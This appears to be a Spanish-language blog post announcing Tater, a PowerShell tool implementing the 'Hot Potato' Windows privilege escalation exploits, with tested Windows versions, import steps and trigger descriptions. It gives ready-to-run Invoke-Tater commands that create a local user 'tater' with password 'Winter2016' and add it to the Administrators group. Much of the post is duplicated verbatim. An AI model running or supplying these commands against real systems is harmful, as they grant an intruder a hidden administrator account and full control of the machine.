Tater de Kevin-Robertson es una implementación en PowerShell de los exploits de "Hot Potato" (que vimos no hace mucho) y mediante los cuales podemos escalar privilegios en Windows.
Ha sido probado con éxito en Windows 7, Windows 8.1, Windows 10 y Windows Server 2012 R2 y pronto lo hará en Windows Server 2008.
Uso:
Para importar con Import-Module:
Import-Module ./Tater.ps1
Para importar usando el método dot source:
. ./Tater.ps1
Invoke-Tater -Trigger 1 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
Invoke-Tater -Trigger 2 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
Pantallazos:
Windows 7 usando el trigger 1 (fuerza bruta NBNS WPAD + actualización de firmas de Windows Defender)
Windows 10 usando el trigger 2 (servicio WebClient + tarea programada)
Windows 7 usando trigger 1 y agotamiento de puertos UDP
Fuente: https://github.com/Kevin-Robertson/Tater
Ha sido probado con éxito en Windows 7, Windows 8.1, Windows 10 y Windows Server 2012 R2 y pronto lo hará en Windows Server 2008.
Uso:
Para importar con Import-Module:
Import-Module ./Tater.ps1
Para importar usando el método dot source:
. ./Tater.ps1
Invoke-Tater -Trigger 1 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
Invoke-Tater -Trigger 2 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
Pantallazos:
Windows 7 usando el trigger 1 (fuerza bruta NBNS WPAD + actualización de firmas de Windows Defender)
Windows 10 usando el trigger 2 (servicio WebClient + tarea programada)
Windows 7 usando trigger 1 y agotamiento de puertos UDP
Fuente: https://github.com/Kevin-Robertson/Tater
Comentarios
Publicar un comentario